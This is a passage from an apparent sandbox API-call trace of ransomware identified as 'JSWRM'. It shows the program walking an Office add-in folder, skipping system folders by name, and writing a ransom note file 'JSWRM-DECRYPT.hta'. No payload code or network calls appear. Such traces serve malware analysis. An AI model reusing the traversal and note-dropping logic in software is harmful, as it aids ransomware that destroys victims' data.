lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.306] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22d260, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c068 | out: hHeap=0x1e0000) returned 1 [0123.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0123.306] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0123.306] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22d298, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0123.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f5f8 [0123.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x244d20 | out: hHeap=0x1e0000) returned 1 [0123.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0123.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.307] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf854e731, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf854e731, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf8574958, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8eaa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 0 [0123.307] FindClose (in: hFindFile=0x231bc0 | out: hFindFile=0x231bc0) returned 1 [0123.307] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f5f8 | out: hHeap=0x1e0000) returned 1 [0123.307] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0123.307] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bad8 | out: hHeap=0x1e0000) returned 1 [0123.307] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf755cb7d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6bfa6d9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6bfa6d9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0123.307] lstrcmpiW (lpString1="pt-BR", lpString2=".") returned 1 [0123.307] lstrcmpiW (lpString1="pt-BR", lpString2="..") returned 1 [0123.307] lstrcmpiW (lpString1="pt-BR", lpString2="...") returned 1 [0123.307] lstrcmpiW (lpString1="pt-BR", lpString2="windows") returned -1 [0123.307] lstrcmpiW (lpString1="pt-BR", lpString2="recovery") returned -1 [0123.307] lstrcmpiW (lpString1="pt-BR", lpString2="perflogs") returned 1 [0123.307] lstrcmpiW (lpString1="pt-BR", lpString2="documents and settings") returned 1 [0123.307] lstrcmpiW (lpString1="pt-BR", lpString2="$RECYCLE.BIN") returned 1 [0123.307] lstrcmpiW (lpString1="pt-BR", lpString2="system volume information") returned -1 [0123.307] lstrcmpiW (lpString1="pt-BR", lpString2="msocache") returned 1 [0123.307] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22aff8 [0123.307] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b2b0 | out: hHeap=0x1e0000) returned 1 [0123.307] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bad8 [0123.307] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x247990 [0123.307] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x166) returned 0x1ff448 [0123.307] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0123.307] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\pt-BR\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\pt-br\\jswrm-decrypt.hta")) returned 0xffffffff [0123.310] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0123.310] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.310] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0123.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24f1e0 [0123.310] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0123.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x250fb0 [0123.310] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e0 | out: hHeap=0x1e0000) returned 1 [0123.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x247c78 [0123.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x166) returned 0x1ff448 [0123.310] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0123.310] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\pt-BR\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\pt-br\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0123.311] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.311] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0123.313] CloseHandle (hObject=0x338) returned 1 [0123.313] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0123.313] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x250fb0 | out: hHeap=0x1e0000) returned 1 [0123.313] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bad8 | out: hHeap=0x1e0000) returned 1 [0123.313] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ad40 [0123.313] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b398 [0123.313] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b0e0 [0123.313] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x248058 [0123.313] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x166) returned 0x1ff448 [0123.313] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0123.313] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\pt-BR\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\pt-br\\jswrm-decrypt.hta")) returned 0x20 [0123.313] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0123.313] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b0e0 | out: hHeap=0x1e0000) returned 1 [0123.313] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b908 [0123.313] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\pt-BR\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf755cb7d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6bfa6d9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4027f720, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName=".", cAlternateFileName="")) returned 0x231bc0 [0123.313] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0123.313] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf755cb7d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6bfa6d9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4027f720, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="..", cAlternateFileName="")) returned 1 [0123.313] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0123.313] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0123.313] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4027f720, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4027f720, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x402a58fe, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0123.313] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0123.313] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0123.313] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0123.313] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0123.313] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0123.313] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0123.314] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0123.314] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0123.314] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0123.314] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0123.314] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0123.314] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.314] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0123.314] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2413a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.314] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0123.314] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.314] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.314] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0123.314] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241330, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.314] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.314] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0123.314] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b908 | out: hHeap=0x1e0000) returned 1 [0123.314] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0123.314] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0123.314] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc0c33db, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc0c33db, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc0e95c0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xeaa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0123.314] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2=".") returned 1 [0123.314] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="..") returned 1 [0123.314] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="...") returned 1 [0123.314] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="windows") returned -1 [0123.314] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="recovery") returned -1 [0123.314] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="perflogs") returned -1 [0123.314] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="documents and settings") returned 1 [0123.314] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.314] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="system volume information") returned -1 [0123.314] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="msocache") returned -1 [0123.314] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0123.314] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.314] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.314] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.314] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0123.314] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ae0 [0123.315] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.315] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.315] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.315] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ae0 | out: hHeap=0x1e0000) returned 1 [0123.315] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x244d20 [0123.315] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0123.315] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.315] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.315] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf9ea37c1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf9ea37c1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf9ea37c1, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x26aa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0123.315] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2=".") returned 1 [0123.315] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="..") returned 1 [0123.315] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="...") returned 1 [0123.315] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="windows") returned -1 [0123.315] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="recovery") returned -1 [0123.315] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="perflogs") returned -1 [0123.315] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="documents and settings") returned 1 [0123.315] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.315] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="system volume information") returned -1 [0123.315] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="msocache") returned -1 [0123.315] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232b48 [0123.315] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.315] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.315] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22cdc8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.315] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232b48 | out: hHeap=0x1e0000) returned 1 [0123.315] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c18 [0123.315] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.315] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.315] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22d260, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.315] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c18 | out: hHeap=0x1e0000) returned 1 [0123.315] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0123.315] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x244d20 | out: hHeap=0x1e0000) returned 1 [0123.315] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.315] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.315] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf7582db3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf7582db3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf7582db3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x32040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0123.315] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2=".") returned 1 [0123.316] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="..") returned 1 [0123.316] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="...") returned 1 [0123.316] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="windows") returned -1 [0123.316] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="recovery") returned -1 [0123.316] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="perflogs") returned -1 [0123.316] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="documents and settings") returned 1 [0123.316] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.316] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="system volume information") returned -1 [0123.316] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="msocache") returned -1 [0123.316] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0123.316] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.316] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.316] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22cdc8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.316] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0123.316] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0123.316] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.316] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.316] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d0a0, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.316] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0123.316] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x2450c8 [0123.316] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.316] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, 